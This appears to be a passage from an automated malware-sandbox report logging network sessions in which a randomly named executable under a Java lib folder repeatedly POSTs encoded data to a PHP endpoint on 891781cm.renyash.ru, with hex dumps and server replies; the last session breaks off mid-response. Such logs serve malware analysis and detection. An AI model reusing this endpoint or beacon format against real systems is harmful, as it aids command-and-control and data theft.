                                                                                                                  36192.168.2.449777104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:37.045202017 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:37.399832010 CET1064OUTData Raw: 55 5e 58 55 5a 58 51 58 55 5a 54 59 51 5b 55 51 58 5e 5c 5a 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XUZXQXUZTYQ[UQX^\ZY\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (%] .&&(.'Y$4V-%/Q$,?/(Z+>#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:37.500730038 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:37.746628046 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:37 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAlKsJATTY%2Fv65myMbPOFd8fa%2F0IhBogIfg6A6EOFevbYBVYpzjNLTLmF3D5E9%2BphERRjQpytn%2Bd3ZPIOd8SXg6rLMBq4mJqOXZLE7oyOiEhqgiv3x4kkOmIvKk8Atf3%2F76ZEOl5"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c50083bf791-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=1473&rtt_var=5944&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=63365&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.449778104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:37.871830940 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:38.228027105 CET1072OUTData Raw: 50 55 58 54 5f 5a 54 5d 55 5a 54 59 51 58 55 5d 58 5d 5c 5c 59 57 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXT_ZT]UZTYQXU]X]\\YWR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(!#+=Z&*)=+''2T-'<$Y60Z<,8<>0*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:38.317608118 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:38.596086025 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUubEN2PvDxgafnohdN2tXD130Vt26ZbmnZy2yXxVBXDe4OYD34vSHvnPwjjqrjYhYgY0LiaMaQ%2FmlE5VsbrMvYruNqY1SSpmCaFNUW0G7BGZnDLStlhmvWGkzaGn8PyLQIAeW%2Fv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c553d9e4309-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2580&min_rtt=2262&rtt_var=1484&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=303723&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.449779104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:38.718750954 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:39.072726011 CET1072OUTData Raw: 55 52 58 51 5a 5d 54 5e 55 5a 54 59 51 5d 55 57 58 5a 5c 54 59 5d 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: URXQZ]T^UZTYQ]UWXZ\TY]R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(Y5[78>%X*>X '4:P-4$X3?&3/08-8?+*#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:39.203114033 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:39.471451044 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NhB7bNgHsD4T%2FxwamLG9tB%2FXDMT%2F67OTHmBnAA1fAmzAkZ2is13kId52c%2F575gZk5y8bHpC%2F18JNaJhVE5V0e1Ps%2Bs3aEyCOnLP0MtaQa5N4K7DYd2XcFF%2B4Q1uhf0pH145uKpKC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c5ab8b942b8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4298&min_rtt=1641&rtt_var=5931&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=63744&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.449780104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:39.608958960 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:39.962810993 CET1072OUTData Raw: 55 53 5d 51 5a 5f 51 5b 55 5a 54 59 51 5c 55 5d 58 5e 5c 5e 59 53 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]QZ_Q[UZTYQ\U]X^\^YSR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ??* ]-_$.*X3X$:9#$?'<<,- Z<X8W><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:40.052577019 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:40.222353935 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UZCPGZqFKlq%2Fi3Xk490qq8ejPz1umJfWS4BPWvLKbUbFSHCh%2BzQEJVQqH2WLtFgpb3%2Fv7NuhnmvtowouJAJlxXsnjM5G3TPmjvY3KZ0lGVGdysF0CVmyZbkSqh8jWqXSMg27gKgG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c600fec5e70-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1756&rtt_var=1146&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=393955&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.449781104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:40.355659962 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:40.712382078 CET1072OUTData Raw: 55 55 58 53 5f 5b 54 58 55 5a 54 59 51 59 55 52 58 5d 5c 5e 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXS_[TXUZTYQYURX]\^YVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +6!;!1-=[*X?Y0B&:$+$?W3<->#?>)#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:40.826877117 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:41.078521967 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2BZPadQYIzZmSH%2BIKmM%2FiZbTIigUyq0Ok%2B6BYhoZCiKtPQigjwRZThL4gZnOP6t8zZQct5YQQAwT%2FMA1Itgk6473icH80DmZK14GNzUle3nI2IX3VcrNU9ysVMPv3mDUhDQMAxnQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c64db6d4309-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1688&rtt_var=6585&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57261&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.449782104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:40.377151966 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:40.727986097 CET1796OUTData Raw: 55 56 58 53 5f 5a 51 59 55 5a 54 59 51 5d 55 52 58 5d 5c 59 59 5c 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXS_ZQYUZTYQ]URX]\YY\R]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(![ +!_%5\*.3_'-($=0<;; Z?.<T)<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:40.832379103 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:41.088488102 CET955INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjrh1TDiNSKaJP7eh4j72AyIo2V22aywNLijKKQ9EIE2%2BP3snwbjPTP8oG0lRWqgl7B3RSkZPK7Y%2BtPY3r%2FPG7u%2F3nO5mSMltFZfVLTjw4NA5nZUfz0LZJ6h1EGnYdvb9CET3q5C"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c64ea9419c3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3642&min_rtt=2058&rtt_var=3941&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=99070&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 24 38 3b 59 28 2d 2a 5c 2d 3f 0d 51 32 3c 22 5d 33 56 3b 00 32 58 3d 14 2e 2b 20 5c 3e 28 30 07 31 2a 03 5a 23 21 2a 11 25 36 2e 5d 04 1d 25 5d 29 04 00 14 2b 2c 2d 5f 3d 32 0e 1b 27 34 3b 59 24 27 3c 5a 24 2e 3e 1f 35 22 38 0d 33 0d 38 57 2a 39 2c 03 24 04 3d 0e 23 10 2e 57 0d 12 21 0c 31 3e 3a 0e 29 32 3b 0b 21 5a 27 53 30 3f 02 0f 33 3f 38 50 23 2b 29 0b 3d 01 23 01 23 24 36 0e 33 04 3b 5b 35 29 2a 04 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q$8;Y(-*\-?Q2<"]3V;2X=.+ \>(01*Z#!*%6.]%])+,-_=2'4;Y$'<Z$.>5"838W*9,$=#.W!1>:)2;!Z'S0?3?8P#+)=##$63;[5)*6"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.449783104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:41.215852976 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:41.579030037 CET1064OUTData Raw: 55 56 5d 56 5f 5d 54 5d 55 5a 54 59 51 5b 55 53 58 59 5c 59 59 5d 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]V_]T]UZTYQ[USXY\YY]R^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<<6#8=X%1Y*3'-4',>33[,+ )<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:41.659877062 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:41.938122988 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BPRGsy5pPfRb6ZT%2FO7xiXgHAYCojrgpQOnL0kf%2FySGzQSowYUNvOHud87JdsdVYNFLKVrpDwCz9Ut%2B8dJkf5byBYF%2F1sk4VnVxgZSWm91Q2XCN5mHqHCoaV1anMCsyFGQzxkZxYb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c6a18c74228-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3126&min_rtt=1748&rtt_var=3412&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1384&delivery_rate=114294&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.449784104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:42.060158014 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:42.417262077 CET1072OUTData Raw: 50 53 5d 57 5f 5a 54 58 55 5a 54 59 51 59 55 5c 58 5b 5c 59 59 52 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]W_ZTXUZTYQYU\X[\YYRRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](1[7-Y%9Y>=<0$:P.B#$133_-.+=4R*<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:42.507689953 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:42.760242939 CET799INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=haxGsU9JSXSqBKKgyq4417TwYnCqTF72UEeuPrWTrUFQ8deManq2nQGghoZDuQQCaIFPl1OdT3NIfQuo78SKqtFSYJWYH6Fy5obYHTRFh5zYlsu64ig9KvhpZ8h9OJbn8txE0Sto"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c6f6d7dc434-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1506&rtt_var=1088&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=405442&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.449785104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:43.015460968 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:43.368752956 CET1072OUTData Raw: 50 51 58 50 5a 56 54 5d 55 5a 54 59 51 5f 55 56 58 59 5c 54 59 56 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXPZVT]UZTYQ_UVXY\TYVR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<,)\!(>%%])-(3%-7$Y',2P$?3,>7?7)#^!'^)7
                                                                                                                  Jan 1, 2025 15:02:43.468702078 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:43.732553959 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
